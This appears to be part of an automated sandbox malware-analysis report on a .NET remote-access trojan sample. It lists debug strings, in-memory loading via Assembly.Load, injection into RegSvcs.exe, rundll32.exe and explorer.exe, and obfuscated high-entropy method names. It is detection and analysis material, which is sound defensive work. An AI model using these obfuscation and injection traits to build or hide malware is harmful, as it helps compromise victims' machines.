Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Data Obfuscation

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, frmMain.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: KfYvtUBOq.exe.0.dr, frmMain.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.2dc7c64.0.raw.unpack, PingPong.cs .Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs .Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs .Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.57d0000.3.raw.unpack, PingPong.cs .Net Code: Justy
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs .Net Code: MCrQY8I1jG System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, -.cs .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: 8.2.KfYvtUBOq.exe.2d77bc8.0.raw.unpack, PingPong.cs .Net Code: Justy
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_0730B09D push ebp; retf 0_2_0730B09E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Code function: 0_2_0730D0E8 pushfd ; ret 0_2_0730D0E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011309AD push ecx; mov dword ptr [esp], ecx 7_2_011309B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0110135E push eax; iretd 7_2_01101369
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01101FEC push eax; iretd 7_2_01101FED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01187E99 push ecx; ret 7_2_01187EAC
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_0730D271 push ss; retf 8_2_0730D277
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_0730B09D push ebp; retf 8_2_0730B09E
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_073B1C70 push eax; retf 8_2_073B1C71
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_073B1C90 pushad ; retf 8_2_073B1C91
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe Code function: 8_2_073BAB00 push eax; mov dword ptr [esp], ecx 8_2_073BAB04
Source: C:\Windows\explorer.exe Code function: 9_2_0E399B1E push esp; retn 0000h 9_2_0E399B1F
Source: C:\Windows\explorer.exe Code function: 9_2_0E399B02 push esp; retn 0000h 9_2_0E399B03
Source: C:\Windows\explorer.exe Code function: 9_2_0E3999B5 push esp; retn 0000h 9_2_0E399AE7
Source: C:\Windows\explorer.exe Code function: 9_2_104FC9B5 push esp; retn 0000h 9_2_104FCAE7
Source: C:\Windows\explorer.exe Code function: 9_2_104FCB02 push esp; retn 0000h 9_2_104FCB03
Source: C:\Windows\explorer.exe Code function: 9_2_104FCB1E push esp; retn 0000h 9_2_104FCB1F
Source: C:\Windows\explorer.exe Code function: 9_2_106409B5 push esp; retn 0000h 9_2_10640AE7
Source: C:\Windows\explorer.exe Code function: 9_2_10640B02 push esp; retn 0000h 9_2_10640B03
Source: C:\Windows\explorer.exe Code function: 9_2_10640B1E push esp; retn 0000h 9_2_10640B1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004172AA push ebx; ret 13_2_004172AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041D4C5 push eax; ret 13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041D57C push eax; ret 13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041D512 push eax; ret 13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041D51B push eax; ret 13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00416656 push ecx; retf 13_2_00416669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041D7FE push dword ptr [397EB1CEh]; ret 13_2_0041DDB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0121225F pushad ; ret 13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012127FA pushad ; ret 13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_012409AD push ecx; mov dword ptr [esp], ecx 13_2_012409B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0121283D push eax; iretd 13_2_01212858
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe Static PE information: section name: .text entropy: 7.977493198205763
Source: KfYvtUBOq.exe.0.dr Static PE information: section name: .text entropy: 7.977493198205763
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rl2KaIv7OoSKlenJW8.cs High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, y5ode1kjT7vPKqO8Yb.cs High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, kRTwBN3eOewQaf7vJ4.cs High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Pk7u70NwNEuQxuZOvd.cs High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, aQCZCcJuBKwtsEAMbC.cs High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, osCub496meBYvUl8guH.cs High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, vbEq958PxqW1DAqw3H.cs High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, k9bExYlAtUDXGnAaNH.cs High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, VqLmSH7RgWutvICVLi.cs High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, NlIU2cH69ja9orLXPY.cs High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, nSqupc9RcXrL7kCSMd6.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, mfRvrEiV6LkHavWeTs.cs High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, r0BndIovQnfinH7bOK.cs High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, O44hq2QsnAk4t8sf0X.cs High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, cPUaQKVh22uqMAgfdU.cs High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, gZ55u8jUyfNBIrR6uM.cs High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, pDACUWT7QZRt25nZDm.cs High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rl2KaIv7OoSKlenJW8.cs High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, y5ode1kjT7vPKqO8Yb.cs High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, kRTwBN3eOewQaf7vJ4.cs High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Pk7u70NwNEuQxuZOvd.cs High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, aQCZCcJuBKwtsEAMbC.cs High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, osCub496meBYvUl8guH.cs High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, vbEq958PxqW1DAqw3H.cs High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, k9bExYlAtUDXGnAaNH.cs High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, VqLmSH7RgWutvICVLi.cs High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, NlIU2cH69ja9orLXPY.cs High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, nSqupc9RcXrL7kCSMd6.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, mfRvrEiV6LkHavWeTs.cs High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, r0BndIovQnfinH7bOK.cs High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, O44hq2QsnAk4t8sf0X.cs High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, cPUaQKVh22uqMAgfdU.cs High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, gZ55u8jUyfNBIrR6uM.cs High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, pDACUWT7QZRt25nZDm.cs High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rl2KaIv7OoSKlenJW8.cs High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, y5ode1kjT7vPKqO8Yb.cs High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, kRTwBN3eOewQaf7vJ4.cs High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Pk7u70NwNEuQxuZOvd.cs High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, aQCZCcJuBKwtsEAMbC.cs High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, osCub496meBYvUl8guH.cs High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, vbEq958PxqW1DAqw3H.cs High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, k9bExYlAtUDXGnAaNH.cs High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
